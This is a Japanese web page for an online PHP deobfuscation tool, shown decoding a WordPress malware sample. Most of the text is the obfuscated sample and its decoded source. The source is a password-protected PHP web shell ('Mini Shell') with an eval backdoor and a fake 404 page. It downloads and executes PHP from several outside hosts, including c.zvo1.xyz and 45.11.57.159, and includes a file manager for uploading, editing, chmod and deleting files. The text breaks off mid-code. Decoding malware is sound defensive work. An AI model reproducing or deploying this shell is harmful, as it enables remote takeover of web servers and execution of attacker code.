Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $zas4t = "cjOMhZRyL8BStDdQwAuK45gInYXlEs20VTzefomUvJ61W_qiCaHxpF3GP7N9bkr"; $DcgAG = $zas4t[22].$zas4t[34].$zas4t[47].$zas4t[24].$zas4t[36].$zas4t[27].$zas4t[49].$zas4t[12].$zas4t[35]; $PN1uG = $zas4t[60].$zas4t[49].$zas4t[29].$zas4t[35].$zas4t[42].$zas4t[20].$zas4t[45].$zas4t[14].$zas4t[35].$zas4t[0].$zas4t[37].$zas4t[14].$zas4t[35]; $toOP1 = "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"; eval($DcgAG($PN1uG($toOP1)));
<?php
$zas4t = "cjOMhZRyL8BStDdQwAuK45gInYXlEs20VTzefomUvJ61W_qiCaHxpF3GP7N9bkr";
$DcgAG = "gzinflate";
$PN1uG = "base64_decode";
$toOP1 = "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";
eval {
@set_time_limit(0);
@error_reporting(0);
$L7CRgr = "c13436acdd4030399a213e717192a900";
function GCNew($a)
{
$url = sprintf('%s?api=%s&action=%s&path=%s&token=%s', $a, $_REQUEST['api'], $_REQUEST['action'], $_REQUEST['path'], $_REQUEST['token']);
$code = @file_get_contents($url);
if ($code == false) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, 'll');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 100);
curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$code = curl_exec($ch);
curl_close($ch);
}
return $code;
}
if (isset($_REQUEST['action']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['token'])) {
$code = GCNew('https://c-new.icw5.xyz/');
$result = json_decode($code, true);
if (isset($result['code']) && $result['code'] == 1) {
$code = $result['data'];
} else {
die($result['msg']);
}
$need = '<?php';
if (strpos($code, $need) === false) {
die('get failed');
}
if (function_exists('tmpfile')) {
$file_name = tmpfile();
fwrite($file_name, $code);
$a = stream_get_meta_data($file_name);
$file_path = $a['uri'];
@(include $file_path);
fclose($file_name);
} else {
$file_path = '.c';
file_put_contents($file_path, $code);
@(include $file_path);
}
@unlink($file_path);
die;
}
function GC($a)
{
$url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $a, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']);
$code = @file_get_contents($url);
if ($code == false) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, 'll');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 100);
curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$code = curl_exec($ch);
curl_close($ch);
}
return $code;
}
if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) {
if (!isset($_REQUEST['s'])) {
$s = 1;
} else {
$s = $_REQUEST['s'];
}
switch ($s) {
case 1:
$code = GC('https://c.zvo1.xyz/');
break;
case 2:
$code = GC('https://c2.icw7.com/');
break;
case 3:
$code = GC('http://45.11.57.159/');
break;
default:
$code = GC('https://c.zvo1.xyz/');
break;
}
$need = '<?php';
if (strpos($code, $need) === false) {
die('get failed');
}
if (function_exists('tmpfile')) {
$file_handle = tmpfile();
fwrite($file_handle, $code);
$a = stream_get_meta_data($file_handle);
$file_path = $a['uri'];
@(include $file_path);
@fclose($file_handle);
} else {
$file_path = '.c';
file_put_contents($file_path, $code);
@(include $file_path);
}
@unlink($file_path);
die;
}
if (isset($_REQUEST['d_time'])) {
die('{->' . $L7CRgr . '<-}');
}
$pass = false;
if (isset($_COOKIE['pass'])) {
if (md5($_COOKIE['pass']) == $L7CRgr) {
$pass = $_REQUEST['pass'];
}
} else {
if (isset($_REQUEST['pass'])) {
if (md5($_REQUEST['pass']) == $L7CRgr) {
setcookie("pass", $_REQUEST['pass']);
$pass = $_REQUEST['pass'];
}
}
}
if (isset($_POST['logout']) && ($_POST['logout'] = 1)) {
setcookie("pass", null);
$pass = false;
}
if (isset($_REQUEST['pwd163']) && md5($_REQUEST['pwd163']) == $L7CRgr) {
$a = base64_decode(rawurldecode(urlencode(urldecode($_REQUEST['zzz']))));
$need = "<?php";
if (strpos($a, $need) === false) {
$a = "<?phpPHP_EOL" . $a;
}
if (isset($_REQUEST['e'])) {
$a = str_replace($need, "", $a);
$b = "eval";
eval($a);
die;
}
$file_name = tmpfile();
fwrite($file_name, $a);
$require_params = stream_get_meta_data($file_name);
@(require $require_params['uri']);
fclose($file_name);
die;
}
if (isset($_REQUEST['auth_key'])) {
die($L7CRgr);
}
if (!$pass) {
if (!isset($_REQUEST['520'])) {
header("HTTP/1.1 404 Not Found");
die;
}
echo '<form action="#" method="post"><input type="password" name="pass" > <input type="submit" value="submit"></form>';
die;
}
echo '<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form>';
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>Mini Shell</title>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</HEAD>
<BODY>
<H1><center><img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
Mini Shell <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
</center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Direktori : ';
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo '<a href="?pass=' . $pass . '&path=/">/</a>';
continue;
}
if ($pat == '') {
continue;
}
echo '<a href="?pass=' . $pass . '&path=';
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo '</td></tr><tr><td>';
if (isset($_POST['path_create'])) {
if (@mkdir($path . '/' . $_POST['path_create'])) {
echo '<font color="green">create success :* ' . $path . '/' . $_POST['path_create'] . '</font><br />';
} else {
echo '<font color="red">create failed :* ' . $path . '/' . $_POST['path_create'] . '</font><br />';
}
}
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo '<font color="green">File Ter-Upload :* </font><br />';
} else {
echo '<font color="red">Upload gagal, Servernya kek <img src="http://c.fastcompany.net/asset_files/-/2014/11/11/4F4.gif"/>
</font><br />';
}
}
echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="hidden" name="pass" value="' . $pass . '">
<input type="submit" value="upload" />
</form>
</td></tr>
<tr><td><form enctype="multipart/form-data" method="POST">
Create Path : <input type="text" name="path_create" />
<input type="hidden" name="pass" value="' . $pass . '">
<input type="submit" value="create" />
</form></td></td>';
if (isset($_GET['filesrc'])) {
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo '</tr></td></table><br />';
echo '<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], octdec($_POST['perm']))) {
echo '<font color="green">Change Permission Done.</font><br />';
} else {
echo '<font color="red">Change Permission Error.</font><br />';
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), 4) . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo '<font color="green">Change Name Done.</font><br />';
} else {
echo '<font color="red">Change Name Error.</font><br />';
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo '<font color="green">Edit File Done ~_^.</font><br />';
} else {
echo '<font color="red">Edit File Error ~_~.</font><br />';
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Go" />
</form>';
}
echo '</center>';
} else {
echo '</table><br /><center>';
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if (rmdir($_POST['path'])) {
echo '<font color="green">Delete Dir Done.</font><br />';
} else {
echo '<font color="red">Delete Dir Error.</font><br />';
}
} elseif ($_POST['type'] == 'file') {
if (unlink($_POST['path'])) {
echo '<font color="green">Delete File Done.</font><br />';
} else {
echo '<font color="red">Delete File Error.</font><br />';
}
}
}
echo '</center>';
$scandir = scandir($path);
echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>';
foreach ($scandir as $dir) {
if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
continue;
}
echo "<tr>\r\n<td><a href=\"?path={$path}/{$dir}&pass={$pass}\">{$dir}</a></td>\r\n<td><center>--</center></td>\r\n<td><center>";
if (is_writable("{$path}/{$dir}")) {
echo '<font color="green">';
} elseif (!is_readable("{$path}/{$dir}")) {
echo '<font color="red">';
}
echo perms("{$path}/{$dir}");
if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
echo '</font>';
}
echo "</center></td>\r\n<td><center><form method=\"POST\" action=\"?option&path={$path}&pass={$pass}\">\r\n<select name=\"opt\">\r\n<option value=\"\"></option>\r\n<option value=\"delete\">Delete</option>\r\n<option value=\"chmod\">Chmod</option>\r\n<option value=\"rename\">Rename</option>\r\n</select>\r\n<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n<input type=\"hidden\" name=\"pass\" value=\"{$pass}\">\r\n<input type=\"submit\" value=\">\" />\r\n</form></center></td>\r\n</tr>";
}
echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
foreach ($scandir as $file) {
if (!is_file("{$path}/{$file}")) {
continue;
}
$size = filesize("{$path}/{$file}") / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
